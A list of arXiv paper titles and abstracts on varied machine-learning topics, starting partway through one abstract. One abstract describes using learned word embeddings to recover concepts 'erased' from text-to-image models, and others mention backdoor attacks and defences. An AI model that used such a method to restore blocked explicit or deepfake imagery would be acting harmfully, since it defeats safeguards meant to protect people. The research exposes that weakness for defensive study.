    Large language models (LLMs) have revolutionized NLP by solving downstream tasks with little to no labeled data. Despite their versatile abilities, the larger question of their ability to reason remains ill-understood. This paper addresses reasoning in math word problems (MWPs) by studying symbolic versions of the numeric problems, since a symbolic expression is a "concise explanation" of the numeric answer. We create and use a symbolic version of the SVAMP dataset and find that GPT-3's davinci-002 model also has good zero-shot accuracy on symbolic MWPs. To evaluate the faithfulness of the model's reasoning, we go beyond accuracy and additionally evaluate the alignment between the final answer and the outputted reasoning, which correspond to numeric and symbolic answers respectively for MWPs. We explore a self-prompting approach to encourage the symbolic reasoning to align with the numeric answer, thus equipping the LLM with the ability to provide a concise and verifiable reasoning and making it more interpretable. Surprisingly, self-prompting also improves the symbolic accuracy to be higher than both the numeric and symbolic accuracies, thus providing an ensembling effect. The SVAMP_Sym dataset will be released for future research on symbolic math problems.
    Hard Adversarial Example Mining for Improving Robust Fairness. (arXiv:2308.01823v1 [cs.LG])
    Adversarial training (AT) is widely considered the state-of-the-art technique for improving the robustness of deep neural networks (DNNs) against adversarial examples (AE). Nevertheless, recent studies have revealed that adversarially trained models are prone to unfairness problems, restricting their applicability. In this paper, we empirically observe that this limitation may be attributed to serious adversarial confidence overfitting, i.e., certain adversarial examples with overconfidence. To alleviate this problem, we propose HAM, a straightforward yet effective framework via adaptive Hard Adversarial example Mining.HAM concentrates on mining hard adversarial examples while discarding the easy ones in an adaptive fashion. Specifically, HAM identifies hard AEs in terms of their step sizes needed to cross the decision boundary when calculating loss value. Besides, an early-dropping mechanism is incorporated to discard the easy examples at the initial stages of AE generation, resulting in efficient AT. Extensive experimental results on CIFAR-10, SVHN, and Imagenette demonstrate that HAM achieves significant improvement in robust fairness while reducing computational cost compared to several state-of-the-art adversarial training methods. The code will be made publicly available.
    DeepSpeed-Chat: Easy, Fast and Affordable RLHF Training of ChatGPT-like Models at All Scales. (arXiv:2308.01320v1 [cs.LG])
    ChatGPT-like models have revolutionized various applications in artificial intelligence, from summarization and coding to translation, matching or even surpassing human performance. However, the current landscape lacks an accessible, efficient, and cost-effective end-to-end RLHF (Reinforcement Learning with Human Feedback) training pipeline for these powerful models, particularly when training at the scale of billions of parameters. This paper introduces DeepSpeed-Chat, a novel system that democratizes RLHF training, making it accessible to the AI community. DeepSpeed-Chat offers three key capabilities: an easy-to-use training and inference experience for ChatGPT-like models, a DeepSpeed-RLHF pipeline that replicates the training pipeline from InstructGPT, and a robust DeepSpeed-RLHF system that combines various optimizations for training and inference in a unified way. The system delivers unparalleled efficiency and scalability, enabling training of models with hundreds of billions of parameters in record time and at a fraction of the cost. With this development, DeepSpeed-Chat paves the way for broader access to advanced RLHF training, even for data scientists with limited resources, thereby fostering innovation and further development in the field of AI.
    Deep Learning-based Prediction of Stress and Strain Maps in Arterial Walls for Improved Cardiovascular Risk Assessment. (arXiv:2308.01771v1 [cs.LG])
    This study investigated the potential of end-to-end deep learning tools as a more effective substitute for FEM in predicting stress-strain fields within 2D cross sections of arterial wall. We first proposed a U-Net based fully convolutional neural network (CNN) to predict the von Mises stress and strain distribution based on the spatial arrangement of calcification within arterial wall cross-sections. Further, we developed a conditional generative adversarial network (cGAN) to enhance, particularly from the perceptual perspective, the prediction accuracy of stress and strain field maps for arterial walls with various calcification quantities and spatial configurations. On top of U-Net and cGAN, we also proposed their ensemble approaches, respectively, to further improve the prediction accuracy of field maps. Our dataset, consisting of input and output images, was generated by implementing boundary conditions and extracting stress-strain field maps. The trained U-Net models can accurately predict von Mises stress and strain fields, with structural similarity index scores (SSIM) of 0.854 and 0.830 and mean squared errors of 0.017 and 0.018 for stress and strain, respectively, on a reserved test set. Meanwhile, the cGAN models in a combination of ensemble and transfer learning techniques demonstrate high accuracy in predicting von Mises stress and strain fields, as evidenced by SSIM scores of 0.890 for stress and 0.803 for strain. Additionally, mean squared errors of 0.008 for stress and 0.017 for strain further support the model's performance on a designated test set. Overall, this study developed a surrogate model for finite element analysis, which can accurately and efficiently predict stress-strain fields of arterial walls regardless of complex geometries and boundary conditions.
    No Agreement Without Loss: Learning and Social Choice in Peer Review. (arXiv:2211.02144v2 [cs.AI] UPDATED)
    In peer review systems, reviewers are often asked to evaluate various features of submissions, such as technical quality or novelty. A score is given to each of the predefined features and based on these the reviewer has to provide an overall quantitative recommendation. It may be assumed that each reviewer has her own mapping from the set of features to a recommendation, and that different reviewers have different mappings in mind. This introduces an element of arbitrariness known as commensuration bias. In this paper we discuss a framework, introduced by Noothigattu, Shah and Procaccia, and then applied by the organizers of the AAAI 2022 conference. Noothigattu, Shah and Procaccia proposed to aggregate reviewer's mapping by minimizing certain loss functions, and studied axiomatic properties of this approach, in the sense of social choice theory. We challenge several of the results and assumptions used in their work and report a number of negative results. On the one hand, we study a trade-off between some of the axioms proposed and the ability of the method to properly capture agreements of the majority of reviewers. On the other hand, we show that dropping a certain unrealistic assumption has dramatic effects, including causing the method to be discontinuous.
    An Effective Data Creation Pipeline to Generate High-quality Financial Instruction Data for Large Language Model. (arXiv:2308.01415v1 [cs.CL])
    At the beginning era of large language model, it is quite critical to generate a high-quality financial dataset to fine-tune a large language model for financial related tasks. Thus, this paper presents a carefully designed data creation pipeline for this purpose. Particularly, we initiate a dialogue between an AI investor and financial expert using ChatGPT and incorporate the feedback of human financial experts, leading to the refinement of the dataset. This pipeline yielded a robust instruction tuning dataset comprised of 103k multi-turn chats. Extensive experiments have been conducted on this dataset to evaluate the model's performance by adopting an external GPT-4 as the judge. The promising experimental results verify that our approach led to significant advancements in generating accurate, relevant, and financial-style responses from AI models, and thus providing a powerful tool for applications within the financial sector.
    Feature Noise Boosts DNN Generalization under Label Noise. (arXiv:2308.01609v1 [cs.LG])
    The presence of label noise in the training data has a profound impact on the generalization of deep neural networks (DNNs). In this study, we introduce and theoretically demonstrate a simple feature noise method, which directly adds noise to the features of training data, can enhance the generalization of DNNs under label noise. Specifically, we conduct theoretical analyses to reveal that label noise leads to weakened DNN generalization by loosening the PAC-Bayes generalization bound, and feature noise results in better DNN generalization by imposing an upper bound on the mutual information between the model weights and the features, which constrains the PAC-Bayes generalization bound. Furthermore, to ensure effective generalization of DNNs in the presence of label noise, we conduct application analyses to identify the optimal types and levels of feature noise to add for obtaining desirable label noise generalization. Finally, extensive experimental results on several popular datasets demonstrate the feature noise method can significantly enhance the label noise generalization of the state-of-the-art label noise method.
    MusicLDM: Enhancing Novelty in Text-to-Music Generation Using Beat-Synchronous Mixup Strategies. (arXiv:2308.01546v1 [cs.SD])
    Diffusion models have shown promising results in cross-modal generation tasks, including text-to-image and text-to-audio generation. However, generating music, as a special type of audio, presents unique challenges due to limited availability of music data and sensitive issues related to copyright and plagiarism. In this paper, to tackle these challenges, we first construct a state-of-the-art text-to-music model, MusicLDM, that adapts Stable Diffusion and AudioLDM architectures to the music domain. We achieve this by retraining the contrastive language-audio pretraining model (CLAP) and the Hifi-GAN vocoder, as components of MusicLDM, on a collection of music data samples. Then, to address the limitations of training data and to avoid plagiarism, we leverage a beat tracking model and propose two different mixup strategies for data augmentation: beat-synchronous audio mixup and beat-synchronous latent mixup, which recombine training audio directly or via a latent embeddings space, respectively. Such mixup strategies encourage the model to interpolate between musical training samples and generate new music within the convex hull of the training data, making the generated music more diverse while still staying faithful to the corresponding style. In addition to popular evaluation metrics, we design several new evaluation metrics based on CLAP score to demonstrate that our proposed MusicLDM and beat-synchronous mixup strategies improve both the quality and novelty of generated music, as well as the correspondence between input text and generated music.
    SAP-sLDA: An Interpretable Interface for Exploring Unstructured Text. (arXiv:2308.01420v1 [cs.CL])
    A common way to explore text corpora is through low-dimensional projections of the documents, where one hopes that thematically similar documents will be clustered together in the projected space. However, popular algorithms for dimensionality reduction of text corpora, like Latent Dirichlet Allocation (LDA), often produce projections that do not capture human notions of document similarity. We propose a semi-supervised human-in-the-loop LDA-based method for learning topics that preserve semantically meaningful relationships between documents in low-dimensional projections. On synthetic corpora, our method yields more interpretable projections than baseline methods with only a fraction of labels provided. On a real corpus, we obtain qualitatively similar results.
    Revisiting Deformable Convolution for Depth Completion. (arXiv:2308.01905v1 [cs.CV])
    Depth completion, which aims to generate high-quality dense depth maps from sparse depth maps, has attracted increasing attention in recent years. Previous work usually employs RGB images as guidance, and introduces iterative spatial propagation to refine estimated coarse depth maps. However, most of the propagation refinement methods require several iterations and suffer from a fixed receptive field, which may contain irrelevant and useless information with very sparse input. In this paper, we address these two challenges simultaneously by revisiting the idea of deformable convolution. We propose an effective architecture that leverages deformable kernel convolution as a single-pass refinement module, and empirically demonstrate its superiority. To better understand the function of deformable convolution and exploit it for depth completion, we further systematically investigate a variety of representative strategies. Our study reveals that, different from prior work, deformable convolution needs to be applied on an estimated depth map with a relatively high density for better performance. We evaluate our model on the large-scale KITTI dataset and achieve state-of-the-art level performance in both accuracy and inference speed. Our code is available at https://github.com/AlexSunNik/ReDC.
    ProMix: Combating Label Noise via Maximizing Clean Sample Utility. (arXiv:2207.10276v4 [cs.LG] UPDATED)
    Learning with Noisy Labels (LNL) has become an appealing topic, as imperfectly annotated data are relatively cheaper to obtain. Recent state-of-the-art approaches employ specific selection mechanisms to separate clean and noisy samples and then apply Semi-Supervised Learning (SSL) techniques for improved performance. However, the selection step mostly provides a medium-sized and decent-enough clean subset, which overlooks a rich set of clean samples. To fulfill this, we propose a novel LNL framework ProMix that attempts to maximize the utility of clean samples for boosted performance. Key to our method, we propose a matched high confidence selection technique that selects those examples with high confidence scores and matched predictions with given labels to dynamically expand a base clean sample set. To overcome the potential side effect of excessive clean set selection procedure, we further devise a novel SSL framework that is able to train balanced and unbiased classifiers on the separated clean and noisy samples. Extensive experiments demonstrate that ProMix significantly advances the current state-of-the-art results on multiple benchmarks with different types and levels of noise. It achieves an average improvement of 2.48\% on the CIFAR-N dataset. The code is available at https://github.com/Justherozen/ProMix
    Evaluating Link Prediction Explanations for Graph Neural Networks. (arXiv:2308.01682v1 [cs.LG])
    Graph Machine Learning (GML) has numerous applications, such as node/graph classification and link prediction, in real-world domains. Providing human-understandable explanations for GML models is a challenging yet fundamental task to foster their adoption, but validating explanations for link prediction models has received little attention. In this paper, we provide quantitative metrics to assess the quality of link prediction explanations, with or without ground-truth. State-of-the-art explainability methods for Graph Neural Networks are evaluated using these metrics. We discuss how underlying assumptions and technical details specific to the link prediction task, such as the choice of distance between node embeddings, can influence the quality of the explanations.
    Circumventing Concept Erasure Methods For Text-to-Image Generative Models. (arXiv:2308.01508v1 [cs.LG])
    Text-to-image generative models can produce photo-realistic images for an extremely broad range of concepts, and their usage has proliferated widely among the general public. On the flip side, these models have numerous drawbacks, including their potential to generate images featuring sexually explicit content, mirror artistic styles without permission, or even hallucinate (or deepfake) the likenesses of celebrities. Consequently, various methods have been proposed in order to "erase" sensitive concepts from text-to-image models. In this work, we examine five recently proposed concept erasure methods, and show that targeted concepts are not fully excised from any of these methods. Specifically, we leverage the existence of special learned word embeddings that can retrieve "erased" concepts from the sanitized models with no alterations to their weights. Our results highlight the brittleness of post hoc concept erasure methods, and call into question their use in the algorithmic toolkit for AI safety.
    Fast Slate Policy Optimization: Going Beyond Plackett-Luce. (arXiv:2308.01566v1 [cs.LG])
    An increasingly important building block of large scale machine learning systems is based on returning slates; an ordered lists of items given a query. Applications of this technology include: search, information retrieval and recommender systems. When the action space is large, decision systems are restricted to a particular structure to complete online queries quickly. This paper addresses the optimization of these large scale decision systems given an arbitrary reward function. We cast this learning problem in a policy optimization framework and propose a new class of policies, born from a novel relaxation of decision functions. This results in a simple, yet efficient learning algorithm that scales to massive action spaces. We compare our method to the commonly adopted Plackett-Luce policy class and demonstrate the effectiveness of our approach on problems with action space sizes in the order of millions.
    Careful Whisper -- leveraging advances in automatic speech recognition for robust and interpretable aphasia subtype classification. (arXiv:2308.01327v1 [cs.SD])
    This paper presents a fully automated approach for identifying speech anomalies from voice recordings to aid in the assessment of speech impairments. By combining Connectionist Temporal Classification (CTC) and encoder-decoder-based automatic speech recognition models, we generate rich acoustic and clean transcripts. We then apply several natural language processing methods to extract features from these transcripts to produce prototypes of healthy speech. Basic distance measures from these prototypes serve as input features for standard machine learning classifiers, yielding human-level accuracy for the distinction between recordings of people with aphasia and a healthy control group. Furthermore, the most frequently occurring aphasia types can be distinguished with 90% accuracy. The pipeline is directly applicable to other diseases and languages, showing promise for robustly extracting diagnostic speech biomarkers.
    UniG-Encoder: A Universal Feature Encoder for Graph and Hypergraph Node Classification. (arXiv:2308.01650v1 [cs.LG])
    Graph and hypergraph representation learning has attracted increasing attention from various research fields. Despite the decent performance and fruitful applications of Graph Neural Networks (GNNs), Hypergraph Neural Networks (HGNNs), and their well-designed variants, on some commonly used benchmark graphs and hypergraphs, they are outperformed by even a simple Multi-Layer Perceptron. This observation motivates a reexamination of the design paradigm of the current GNNs and HGNNs and poses challenges of extracting graph features effectively. In this work, a universal feature encoder for both graph and hypergraph representation learning is designed, called UniG-Encoder. The architecture starts with a forward transformation of the topological relationships of connected nodes into edge or hyperedge features via a normalized projection matrix. The resulting edge/hyperedge features, together with the original node features, are fed into a neural network. The encoded node embeddings are then derived from the reversed transformation, described by the transpose of the projection matrix, of the network's output, which can be further used for tasks such as node classification. The proposed architecture, in contrast to the traditional spectral-based and/or message passing approaches, simultaneously and comprehensively exploits the node features and graph/hypergraph topologies in an efficient and unified manner, covering both heterophilic and homophilic graphs. The designed projection matrix, encoding the graph features, is intuitive and interpretable. Extensive experiments are conducted and demonstrate the superior performance of the proposed framework on twelve representative hypergraph datasets and six real-world graph datasets, compared to the state-of-the-art methods. Our implementation is available online at https://github.com/MinhZou/UniG-Encoder.
    Bidirectional Contrastive Split Learning for Visual Question Answering. (arXiv:2208.11435v3 [cs.CV] UPDATED)
    Visual Question Answering (VQA) based on multi-modal data facilitates real-life applications such as home robots and medical diagnoses. One significant challenge is to devise a robust decentralized learning framework for various client models where centralized data collection is refrained due to confidentiality concerns. This work aims to tackle privacy-preserving VQA by decoupling a multi-modal model into representation modules and a contrastive module and leveraging inter-module gradients sharing and inter-client weight sharing. To this end, we propose Bidirectional Contrastive Split Learning (BiCSL) to train a global multi-modal model on the entire data distribution of decentralized clients. We employ the contrastive loss that enables a more efficient self-supervised learning of decentralized modules. Comprehensive experiments are conducted on the VQA-v2 dataset based on five SOTA VQA models, demonstrating the effectiveness of the proposed method. Furthermore, we inspect BiCSL's robustness against a dual-key backdoor attack on VQA. Consequently, BiCSL shows much better robustness to the multi-modal adversarial attack compared to the centralized learning method, which provides a promising approach to decentralized multi-modal learning.
    Lode Enhancer: Level Co-creation Through Scaling. (arXiv:2308.01543v1 [cs.LG])
    We explore AI-powered upscaling as a design assistance tool in the context of creating 2D game levels. Deep neural networks are used to upscale artificially downscaled patches of levels from the puzzle platformer game Lode Runner. The trained networks are incorporated into a web-based editor, where the user can create and edit levels at three different levels of resolution: 4x4, 8x8, and 16x16. An edit at any resolution instantly transfers to the other resolutions. As upscaling requires inventing features that might not be present at lower resolutions, we train neural networks to reproduce these features. We introduce a neural network architecture that is capable of not only learning upscaling but also giving higher priority to less frequent tiles. To investigate the potential of this tool and guide further development, we conduct a qualitative study with 3 designers to understand how they use it. Designers enjoyed co-designing with the tool, liked its underlying concept, and provided feedback for further improvement.
    Interleaving GANs with knowledge graphs to support design creativity for book covers. (arXiv:2308.01626v1 [cs.CV])
    An attractive book cover is important for the success of a book. In this paper, we apply Generative Adversarial Networks (GANs) to the book covers domain, using different methods for training in order to obtain better generated images. We interleave GANs with knowledge graphs to alter the input title to obtain multiple possible options for any given title, which are then used as an augmented input to the generator. Finally, we use the discriminator obtained during the training phase to select the best images generated with new titles. Our method performed better at generating book covers than previous attempts, and the knowledge graph gives better options to the book author or editor compared to using GANs alone.
    AnyTeleop: A General Vision-Based Dexterous Robot Arm-Hand Teleoperation System. (arXiv:2307.04577v2 [cs.RO] UPDATED)
    Vision-based teleoperation offers the possibility to endow robots with human-level intelligence to physically interact with the environment, while only requiring low-cost camera sensors. However, current vision-based teleoperation systems are designed and engineered towards a particular robot model and deploy environment, which scales poorly as the pool of the robot models expands and the variety of the operating environment increases. In this paper, we propose AnyTeleop, a unified and general teleoperation system to support multiple different arms, hands, realities, and camera configurations within a single system. Although being designed to provide great flexibility to the choice of simulators and real hardware, our system can still achieve great performance. For real-world experiments, AnyTeleop can outperform a previous system that was designed for a specific robot hardware with a higher success rate, using the same robot. For teleoperation in simulation, AnyTeleop leads to better imitation learning performance, compared with a previous system that is particularly designed for that simulator. Project page: this http URL
    EmbeddingTree: Hierarchical Exploration of Entity Features in Embedding. (arXiv:2308.01329v1 [cs.LG])
    Embedding learning transforms discrete data entities into continuous numerical representations, encoding features/properties of the entities. Despite the outstanding performance reported from different embedding learning algorithms, few efforts were devoted to structurally interpreting how features are encoded in the learned embedding space. This work proposes EmbeddingTree, a hierarchical embedding exploration algorithm that relates the semantics of entity features with the less-interpretable embedding vectors. An interactive visualization tool is also developed based on EmbeddingTree to explore high-dimensional embeddings. The tool helps users discover nuance features of data entities, perform feature denoising/injecting in embedding training, and generate embeddings for unseen entities. We demonstrate the efficacy of EmbeddingTree and our visualization tool through embeddings generated for industry-scale merchant data and the public 30Music listening/playlists dataset.
    Statistical Estimation Under Distribution Shift: Wasserstein Perturbations and Minimax Theory. (arXiv:2308.01853v1 [stat.ML])
    Distribution shifts are a serious concern in modern statistical learning as they can systematically change the properties of the data away from the truth. We focus on Wasserstein distribution shifts, where every data point may undergo a slight perturbation, as opposed to the Huber contamination model where a fraction of observations are outliers. We formulate and study shifts beyond independent perturbations, exploring Joint Distribution Shifts, where the per-observation perturbations can be coordinated. We analyze several important statistical problems, including location estimation, linear regression, and non-parametric density estimation. Under a squared loss for mean estimation and prediction error in linear regression, we find the exact minimax risk, a least favorable perturbation, and show that the sample mean and least squares estimators are respectively optimal. This holds for both independent and joint shifts, but the least favorable perturbations and minimax risks differ. For other problems, we provide nearly optimal estimators and precise finite-sample bounds. We also introduce several tools for bounding the minimax risk under distribution shift, such as a smoothing technique for location families, and generalizations of classical tools including least favorable sequences of priors, the modulus of continuity, Le Cam's, Fano's, and Assouad's methods.
    RAB: Provable Robustness Against Backdoor Attacks. (arXiv:2003.08904v8 [cs.LG] UPDATED)
    Recent studies have shown that deep neural networks (DNNs) are vulnerable to adversarial attacks, including evasion and backdoor (poisoning) attacks. On the defense side, there have been intensive efforts on improving both empirical and provable robustness against evasion attacks; however, the provable robustness against backdoor attacks still remains largely unexplored. In this paper, we focus on certifying the machine learning model robustness against general threat models, especially backdoor attacks. We first provide a unified framework via randomized smoothing techniques and show how it can be instantiated to certify the robustness against both evasion and backdoor attacks. We then propose the first robust training process, RAB, to smooth the trained model and certify its robustness against backdoor attacks. We prove the robustness bound for machine learning models trained with RAB and prove that our robustness bound is tight. In addition, we theoretically show that it is possible to train the robust smoothed models efficiently for simple models such as K-nearest neighbor classifiers, and we propose an exact smooth-training algorithm that eliminates the need to sample from a noise distribution for such models. Empirically, we conduct comprehensive experiments for different machine learning (ML) models such as DNNs, support vector machines, and K-NN models on MNIST, CIFAR-10, and ImageNette datasets and provide the first benchmark for certified robustness against backdoor attacks. In addition, we evaluate K-NN models on a spambase tabular dataset to demonstrate the advantages of the proposed exact algorithm. Both the theoretic analysis and the comprehensive evaluation on diverse ML models and datasets shed light on further robust learning strategies against general training time attacks.
    A Novel Convolutional Neural Network Architecture with a Continuous Symmetry. (arXiv:2308.01621v1 [cs.CV])
    This paper introduces a new Convolutional Neural Network (ConvNet) architecture inspired by a class of partial differential equations (PDEs) called quasi-linear hyperbolic systems. With comparable performance on image classification task, it allows for the modification of the weights via a continuous group of symmetry. This is a significant shift from traditional models where the architecture and weights are essentially fixed. We wish to promote the (internal) symmetry as a new desirable property for a neural network, and to draw attention to the PDE perspective in analyzing and interpreting ConvNets in the broader Deep Learning community.
    Matrix Estimation for Individual Fairness. (arXiv:2302.02096v2 [cs.LG] UPDATED)
    In recent years, multiple notions of algorithmic fairness have arisen. One such notion is individual fairness (IF), which requires that individuals who are similar receive similar treatment. In parallel, matrix estimation (ME) has emerged as a natural paradigm for handling noisy data with missing values. In this work, we connect the two concepts. We show that pre-processing data using ME can improve an algorithm's IF without sacrificing performance. Specifically, we show that using a popular ME method known as singular value thresholding (SVT) to pre-process the data provides a strong IF guarantee under appropriate conditions. We then show that, under analogous conditions, SVT pre-processing also yields estimates that are consistent and approximately minimax optimal. As such, the ME pre-processing step does not, under the stated conditions, increase the prediction error of the base algorithm, i.e., does not impose a fairness-performance trade-off. We verify these results on synthetic and real data.
    How many preprints have actually been printed and why: a case study of computer science preprints on arXiv. (arXiv:2308.01899v1 [cs.DL])
    Preprints play an increasingly critical role in academic communities. There are many reasons driving researchers to post their manuscripts to preprint servers before formal submission to journals or conferences, but the use of preprints has also sparked considerable controversy, especially surrounding the claim of priority. In this paper, a case study of computer science preprints submitted to arXiv from 2008 to 2017 is conducted to quantify how many preprints have eventually been printed in peer-reviewed venues. Among those published manuscripts, some are published under different titles and without an update to their preprints on arXiv. In the case of these manuscripts, the traditional fuzzy matching method is incapable of mapping the preprint to the final published version. In view of this issue, we introduce a semantics-based mapping method with the employment of Bidirectional Encoder Representations from Transformers (BERT). With this new mapping method and a plurality of data sources, we find that 66% of all sampled preprints are published under unchanged titles and 11% are published under different titles and with other modifications. A further analysis was then performed to investigate why these preprints but not others were accepted for publication. Our comparison reveals that in the field of computer science, published preprints feature adequate revisions, multiple authorship, detailed abstract and introduction, extensive and authoritative references and available source code.
    Tensor Programs IVb: Adaptive Optimization in the Infinite-Width Limit. (arXiv:2308.01814v1 [cs.LG])
    Going beyond stochastic gradient descent (SGD), what new phenomena emerge in wide neural networks trained by adaptive optimizers like Adam? Here we show: The same dichotomy between feature learning and kernel behaviors (as in SGD) holds for general optimizers as well, including Adam -- albeit with a nonlinear notion of "kernel." We derive the corresponding "neural tangent" and "maximal update" limits for any architecture. Two foundational advances underlie the above results: 1) A new Tensor Program language, NEXORT, that can express how adaptive optimizers process gradients into updates. 2) The introduction of bra-ket notation to drastically simplify expressions and calculations in Tensor Programs. This work summarizes and generalizes all previous results in the Tensor Programs series of papers.
    Successor Feature Neural Episodic Control. (arXiv:2111.03110v2 [cs.LG] UPDATED)
    A longstanding goal in reinforcement learning is to build intelligent agents that show fast learning and a flexible transfer of skills akin to humans and animals. This paper investigates the integration of two frameworks for tackling those goals: episodic control and successor features. Episodic control is a cognitively inspired approach relying on episodic memory, an instance-based memory model of an agent's experiences. Meanwhile, successor features and generalized policy improvement (SF&GPI) is a meta and transfer learning framework allowing to learn policies for tasks that can be efficiently reused for later tasks which have a different reward function. Individually, these two techniques have shown impressive results in vastly improving sample efficiency and the elegant reuse of previously learned policies. Thus, we outline a combination of both approaches in a single reinforcement learning framework and empirically illustrate its benefits.
    Merging satellite and gauge-measured precipitation using LightGBM with an emphasis on extreme quantiles. (arXiv:2302.03606v2 [eess.SP] UPDATED)
    Knowing the actual precipitation in space and time is critical in hydrological modelling applications, yet the spatial coverage with rain gauge stations is limited due to economic constraints. Gridded satellite precipitation datasets offer an alternative option for estimating the actual precipitation by covering uniformly large areas, albeit related estimates are not accurate. To improve precipitation estimates, machine learning is applied to merge rain gauge-based measurements and gridded satellite precipitation products. In this context, observed precipitation plays the role of the dependent variable, while satellite data play the role of predictor variables. Random forests is the dominant machine learning algorithm in relevant applications. In those spatial predictions settings, point predictions (mostly the mean or the median of the conditional distribution) of the dependent variable are issued. The aim of the manuscript is to solve the problem of probabilistic prediction of precipitation with an emphasis on extreme quantiles in spatial interpolation settings. Here we propose, issuing probabilistic spatial predictions of precipitation using Light Gradient Boosting Machine (LightGBM). LightGBM is a boosting algorithm, highlighted by prize-winning entries in prediction and forecasting competitions. To assess LightGBM, we contribute a large-scale application that includes merging daily precipitation measurements in contiguous US with PERSIANN and GPM-IMERG satellite precipitation data. We focus on extreme quantiles of the probability distribution of the dependent variable, where LightGBM outperforms quantile regression forests (QRF, a variant of random forests) in terms of quantile score at extreme quantiles. Our study offers understanding of probabilistic predictions in spatial settings using machine learning.
    From Latent Graph to Latent Topology Inference: Differentiable Cell Complex Module. (arXiv:2305.16174v2 [cs.LG] UPDATED)
    Latent Graph Inference (LGI) relaxed the reliance of Graph Neural Networks (GNNs) on a given graph topology by dynamically learning it. However, most of LGI methods assume to have a (noisy, incomplete, improvable, ...) input graph to rewire and can solely learn regular graph topologies. In the wake of the success of Topological Deep Learning (TDL), we study Latent Topology Inference (LTI) for learning higher-order cell complexes (with sparse and not regular topology) describing multi-way interactions between data points. To this aim, we introduce the Differentiable Cell Complex Module (DCM), a novel learnable function that computes cell probabilities in the complex to improve the downstream task. We show how to integrate DCM with cell complex message passing networks layers and train it in a end-to-end fashion, thanks to a two-step inference procedure that avoids an exhaustive search across all possible cells in the input, thus maintaining scalability. Our model is tested on several homophilic and heterophilic graph datasets and it is shown to outperform other state-of-the-art techniques, offering significant improvements especially in cases where an input graph is not provided.
    A digital twin framework for civil engineering structures. (arXiv:2308.01445v1 [math.NA])
    The digital twin concept represents an appealing opportunity to advance condition-based and predictive maintenance paradigms for civil engineering systems, thus allowing reduced lifecycle costs, increased system safety, and increased system availability. This work proposes a predictive digital twin approach to the health monitoring, maintenance, and management planning of civil engineering structures. The asset-twin coupled dynamical system is encoded employing a probabilistic graphical model, which allows all relevant sources of uncertainty to be taken into account. In particular, the time-repeating observations-to-decisions flow is modeled using a dynamic Bayesian network. Real-time structural health diagnostics are provided by assimilating sensed data with deep learning models. The digital twin state is continually updated in a sequential Bayesian inference fashion. This is then exploited to inform the optimal planning of maintenance and management actions within a dynamic decision-making framework. A preliminary offline phase involves the population of training datasets through a reduced-order numerical model and the computation of a health-dependent control policy. The strategy is assessed on two synthetic case studies, involving a cantilever beam and a railway bridge, demonstrating the dynamic decision-making capabilities of health-aware digital twins.
    InterAct: Exploring the Potentials of ChatGPT as a Cooperative Agent. (arXiv:2308.01552v1 [cs.AI])
    This research paper delves into the integration of OpenAI's ChatGPT into embodied agent systems, evaluating its influence on interactive decision-making benchmark. Drawing a parallel to the concept of people assuming roles according to their unique strengths, we introduce InterAct. In this approach, we feed ChatGPT with varied prompts, assigning it a numerous roles like a checker and a sorter, then integrating them with the original language model. Our research shows a remarkable success rate of 98% in AlfWorld, which consists of 6 different tasks in a simulated household environment, emphasizing the significance of proficient prompt engineering. The results highlight ChatGPT's competence in comprehending and performing intricate tasks effectively in real-world settings, thus paving the way for further advancements in task planning.
    The Capability of Large Language Models to Measure Psychiatric Functioning. (arXiv:2308.01834v1 [cs.CL])
    The current work investigates the capability of Large language models (LLMs) that are explicitly trained on large corpuses of medical knowledge (Med-PaLM 2) to predict psychiatric functioning from patient interviews and clinical descriptions without being trained to do so. To assess this, n = 145 depression and n =115 PTSD assessments and n = 46 clinical case studies across high prevalence/high comorbidity disorders (Depressive, Anxiety, Psychotic, trauma and stress, Addictive disorders) were analyzed using prompts to extract estimated clinical scores and diagnoses. Results demonstrate that Med-PaLM 2 is capable of assessing psychiatric functioning across a range of psychiatric conditions with the strongest performance being the prediction of depression scores based on standardized assessments (Accuracy range= 0.80 - 0.84) which were statistically indistinguishable from human clinical raters t(1,144) = 1.20; p = 0.23. Results show the potential for general clinical language models to flexibly predict psychiatric risk based on free descriptions of functioning from both patients and clinicians.
    Deep Learning-based surrogate models for parametrized PDEs: handling geometric variability through graph neural networks. (arXiv:2308.01602v1 [math.NA])
    Mesh-based simulations play a key role when modeling complex physical systems that, in many disciplines across science and engineering, require the solution of parametrized time-dependent nonlinear partial differential equations (PDEs). In this context, full order models (FOMs), such as those relying on the finite element method, can reach high levels of accuracy, however often yielding intensive simulations to run. For this reason, surrogate models are developed to replace computationally expensive solvers with more efficient ones, which can strike favorable trade-offs between accuracy and efficiency. This work explores the potential usage of graph neural networks (GNNs) for the simulation of time-dependent PDEs in the presence of geometrical variability. In particular, we propose a systematic strategy to build surrogate models based on a data-driven time-stepping scheme where a GNN architecture is used to efficiently evolve the system. With respect to the majority of surrogate models, the proposed approach stands out for its ability of tackling problems with parameter dependent spatial domains, while simultaneously generalizing to different geometries and mesh resolutions. We assess the effectiveness of the proposed approach through a series of numerical experiments, involving both two- and three-dimensional problems, showing that GNNs can provide a valid alternative to traditional surrogate models in terms of computational efficiency and generalization to new scenarios. We also assess, from a numerical standpoint, the importance of using GNNs, rather than classical dense deep neural networks, for the proposed framework.
    Exploiting Multi-Label Correlation in Label Distribution Learning. (arXiv:2308.01742v1 [cs.LG])
    Label Distribution Learning (LDL) is a novel machine learning paradigm that assigns label distribution to each instance. Many LDL methods proposed to leverage label correlation in the learning process to solve the exponential-sized output space; among these, many exploited the low-rank structure of label distribution to capture label correlation. However, recent studies disclosed that label distribution matrices are typically full-rank, posing challenges to those works exploiting low-rank label correlation. Note that multi-label is generally low-rank; low-rank label correlation is widely adopted in multi-label learning (MLL) literature. Inspired by that, we introduce an auxiliary MLL process in LDL and capture low-rank label correlation on that MLL rather than LDL. In such a way, low-rank label correlation is appropriately exploited in our LDL methods. We conduct comprehensive experiments and demonstrate that our methods are superior to existing LDL methods. Besides, the ablation studies justify the advantages of exploiting low-rank label correlation in the auxiliary MLL.
    Online covariance estimation for stochastic gradient descent under Markovian sampling. (arXiv:2308.01481v1 [math.ST])
